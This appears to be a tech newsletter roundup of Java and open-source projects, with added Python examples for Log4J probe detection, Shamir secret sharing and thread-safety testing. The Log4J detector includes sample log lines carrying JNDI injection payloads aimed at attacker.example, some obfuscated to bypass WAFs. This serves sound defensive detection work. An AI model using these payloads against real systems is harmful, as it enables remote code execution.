We have been researching the Log4J RCE (CVE-2021-44228) since it was released, and we worked on preventing this vulnerability with our customers. We are open-sourcing an open detection and scanning tool for discovering and fuzzing for the Log4J RCE CVE-2021-44228 vulnerability. This shall be used by security teams to scan their infrastructure for Log4J RCE, and also to test for WAF bypasses that can result in achieving code execution on the organization’s environment.
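The "WAF bypasses" part is the interesting bit: a rule that matches the literal string `${jndi:` misses the nested-lookup and URL-encoded variants. As an added example (my own detection logic, not the scanner's code), the script below undoes URL encoding and resolves Log4j's documented `${lower:x}`, `${upper:x}` and `${key:-default}` lookup forms inside-out before matching, run over constructed log lines:

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not captured traffic): a benign request,
# a plain JNDI probe in the User-Agent, two nested-lookup obfuscations,
# a URL-encoded probe in the query string, and a harmless non-JNDI lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.3 - - "GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 404 "curl/7.79"',
    '10.0.0.4 - - "GET / HTTP/1.1" 200 "${env:HOME}"',
]

# A ${...} whose body contains no further braces, i.e. the innermost lookup.
_INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# The canonical form every variant collapses to once the obfuscation is undone.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(m):
    """Evaluate one innermost Log4j lookup the way an attacker relies on it:
    ${lower:x} -> x lowercased, ${upper:x} -> x uppercased, ${anything:-d} -> d.
    A jndi lookup is kept verbatim so the default-value rule cannot hide it."""
    inner = m.group(1)
    if inner.lstrip().lower().startswith("jndi:"):
        return m.group(0)
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    kind, sep, arg = inner.partition(":")
    if sep and kind.lower() == "lower":
        return arg.lower()
    if sep and kind.lower() == "upper":
        return arg.upper()
    return m.group(0)  # unknown lookup with no default: leave untouched


def normalize(text, max_rounds=10):
    """Undo repeated URL encoding, then resolve nested lookups inside-out until
    the text stops changing, so obfuscated payloads reach their ${jndi:...} form."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        resolved = _INNERMOST.sub(_resolve_one, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_probes(lines):
    """Return (line_number, normalized_payload) for each line carrying a JNDI
    lookup; matching happens on the normalized text, not on the raw bytes a
    signature-only WAF rule would see."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if not m:
            continue
        end = norm.find("}", m.end())
        payload = norm[m.start():end + 1] if end != -1 else norm[m.start():]
        hits.append((n, payload))
    return hits


if __name__ == "__main__":
    for n, payload in find_jndi_probes(SAMPLE_LOG_LINES):
        print(f"line {n}: {payload}")
```

The resolver is deliberately a best-effort subset of Log4j's lookup syntax, enough to collapse the common nesting tricks; it is not a full reimplementation, and a lookup it cannot resolve is left in place rather than guessed at. The same normalize-then-match approach is what a WAF rule needs if it is to catch these variants.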
This may seem silly at first, but DeepfakeHTTP actually has a bunch of interesting use cases:
- Creating the product PoC or demo before even starting out with the backend
- REST, GraphQL, and other API prototyping and testing
- Hiding critical enterprise infrastructure behind a simple static facade
- Hacking and fine-tuning HTTP communications on both server and client sides
This cool open source project provides transparent client-side encryption to be used with your cloud file storage of choice. Which choices, you ask?
Works with Dropbox, Google Drive, OneDrive, MEGA, pCloud, ownCloud, Nextcloud and any other cloud storage service which synchronizes with a local directory
Cryptomator works with Dropbox, Google Drive, OneDrive, ownCloud, Nextcloud and any other cloud storage service which synchronizes with a local directory. Since it’s open source, you can check for backdoors. Since it’s entirely client-side, you don’t have to trust anybody else’s machines.
Johan Vos joined us to talk about his new book ‘Quantum Computing for Developers’ which is available to read right now as part of the Manning Early Access Program (MEAP). Listen near the end of the show to learn how you can get a free copy or check the show notes for details. We talked with Johan about the core principles of Quantum Computing, the hardware and software involved, the differences between quantum computing and classical computing, a little bit of physics, and what we developers can do today to prepare for the perhaps-not-so-distant future of Quantum Computing.
Our approach comes from low-latency trading; QuestDB’s stack is engineered from scratch, zero-GC Java and dependency-free.
QuestDB ingests data via HTTP, PostgreSQL wire protocol, Influx line protocol or directly from Java. Reading data is done using SQL via HTTP, PostgreSQL wire protocol or via Java API. The whole database and console fit in a 3.5 MB package.
According to the great knowledge base in the sky, NewSQL is, “a class of relational database management systems that seek to provide the scalability of NoSQL systems for online transaction processing workloads while maintaining the ACID guarantees of a traditional database system.”
It’s not fully open source yet, but there’s a placeholder repo which states:
Be assured efforts are under way to make the software available here. In the meantime, enjoy using Ghidra on your SRE efforts, developing your own scripts and plugins, and perusing the over-one-million-lines of Java and Sleigh code released within the initial public release.
Why cold storage? Because security:
For security purposes, Square stores a reserve of Bitcoins in an offline setting. By having these funds offline, we reduce attack surface and hence risk of theft.
Square can move the funds offline at any time, but moving them back online requires a multi-party signing ceremony. They can also embed programming logic into the cold storage modules, so that only Square-owned addresses can receive the funds. That’s defense-in-depth, right there.
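The page does not say how Square's ceremony is built, so as an added illustration (my own code, not Square's) of what a multi-party requirement plus a destination whitelist looks like in practice, here is a k-of-n Shamir secret-sharing split of a hypothetical key-encryption key, with a withdrawal policy that enforces both controls. The wallet names and the key value are constructed placeholders:

```python
import secrets

# Field prime for the polynomial arithmetic. 2**127 - 1 is a Mersenne prime,
# large enough to hold a 128-bit key-encryption key as a single field element.
PRIME = 2**127 - 1

# Constructed placeholders standing in for "Square-owned addresses".
ALLOWED_DESTINATIONS = {"hot-wallet-1", "hot-wallet-2"}


def split_secret(secret, threshold, shares):
    """Split `secret` into `shares` points on a random polynomial of degree
    threshold-1; any `threshold` points reconstruct it, fewer reveal nothing."""
    if not 1 <= threshold <= shares:
        raise ValueError("need 1 <= threshold <= shares")
    if not 0 <= secret < PRIME:
        raise ValueError("secret must fit in the field")
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(threshold - 1)]
    points = []
    for x in range(1, shares + 1):
        y = 0
        for c in reversed(coeffs):  # Horner evaluation modulo PRIME
            y = (y * x + c) % PRIME
        points.append((x, y))
    return points


def recover_secret(points):
    """Lagrange interpolation at x = 0 over the field."""
    xs = [x for x, _ in points]
    if len(set(xs)) != len(xs):
        raise ValueError("duplicate share indices")
    total = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = (num * (-xj)) % PRIME
                den = (den * (xi - xj)) % PRIME
        total = (total + yi * num * pow(den, -1, PRIME)) % PRIME
    return total


def authorize_withdrawal(destination, shares_presented, threshold):
    """The two controls from the description, in order: the destination must be
    on the owned-address list, and a full quorum of shares must be present.
    Returns the reconstructed key on success and None on refusal. Reconstructing
    from fewer than `threshold` shares would yield a random value rather than an
    error, which is why the count is checked explicitly."""
    if destination not in ALLOWED_DESTINATIONS:
        return None
    if len(shares_presented) < threshold:
        return None
    return recover_secret(shares_presented[:threshold])


if __name__ == "__main__":
    key = 0x0123456789ABCDEF0123456789ABCDEF  # constructed placeholder key
    pts = split_secret(key, 3, 5)
    print(authorize_withdrawal("hot-wallet-1", pts[:3], 3) == key)  # True
    print(authorize_withdrawal("hot-wallet-1", pts[:2], 3))         # None
    print(authorize_withdrawal("attacker-address", pts, 3))         # None
```

The point of the quorum check is that an under-threshold reconstruction fails silently rather than loudly, so the policy layer, not the arithmetic, is what turns "not enough signers in the room" into a refusal.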
Bitcoin’s latest bull run is over, but those who believe in decentralized money continue to toil away… building the future they want to exist.
So you have built a shiny Java library and want to share it with the world?
Nice intro for beginners. 👌
A visual explanation on why model objects are not a good practice in object-oriented software.
It is explained that a developer’s job should be that of an engineer rather than that of a manual worker (I would say even that of a puppeteer, but I don’t like the rhyme); objects should be alive and have behaviour of their own rather than being mere models surrounded by tools, artificial ways of making them act as if they were alive.
Netflix open sourced their cloud gateway:
The Cloud Gateway team at Netflix runs and operates more than 80 clusters of Zuul 2, sending traffic to about 100 (and growing) backend service clusters which amounts to more than 1 million requests per second.
Pretty impressive. Click through to get the details of how Zuul 2 works and how they use it inside Netflix. I love when companies that are operating at webscale (😏) share their practices and code with the rest of us.
Thread-safety is an important quality of classes in languages/platforms like Java, where we frequently share objects between threads. The issues caused by lack of thread-safety are very difficult to debug, since they are sporadic and almost impossible to reproduce on purpose. How do you test your objects to make sure they are thread-safe? Here is how I’m doing it.
Great details on a particularly difficult aspect of testing. ✨
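The post is about Java, but the shape of a thread-safety test is the same anywhere: start all workers at the same instant, hammer the shared object, then check an invariant that only holds if every update survived. As an added example (my own harness, not the author's), here it is in Python with a deliberately racy counter beside a locked one; the sleep in the racy version only widens the read-modify-write window so the lost update is easy to provoke:

```python
import threading
import time


class UnsafeCounter:
    """Read-modify-write with no lock. The sleep(0) yields between the read and
    the write so another thread can read the same stale value (a lost update)."""

    def __init__(self):
        self.value = 0

    def increment(self):
        current = self.value
        time.sleep(0)
        self.value = current + 1


class SafeCounter:
    """Same operation guarded by a lock: the read and write are one unit."""

    def __init__(self):
        self.value = 0
        self._lock = threading.Lock()

    def increment(self):
        with self._lock:
            self.value += 1


def stress(make_counter, threads=8, increments=200):
    """Run `threads` workers that each call increment() `increments` times,
    releasing them together through a Barrier to maximise contention.
    Returns (expected, actual) so the caller can compare."""
    counter = make_counter()
    start = threading.Barrier(threads)

    def worker():
        start.wait()  # nobody starts until everyone is ready
        for _ in range(increments):
            counter.increment()

    workers = [threading.Thread(target=worker) for _ in range(threads)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return threads * increments, counter.value


def is_thread_safe(make_counter, rounds=5):
    """Races are sporadic, so repeat the stress run; a single lost update in
    any round is a failure. A pass is evidence, not proof; a fail is proof."""
    return all(expected == actual
               for expected, actual in (stress(make_counter) for _ in range(rounds)))


if __name__ == "__main__":
    print("UnsafeCounter:", stress(UnsafeCounter))   # actual typically well below expected
    print("SafeCounter:", stress(SafeCounter))       # (1600, 1600)
    print("SafeCounter passes:", is_thread_safe(SafeCounter))
```

The Barrier matters: without it the first thread often finishes before the last one starts, and the test passes for the wrong reason. A Java version would use the same structure with an `ExecutorService` and a `CountDownLatch` in place of the threads and the Barrier.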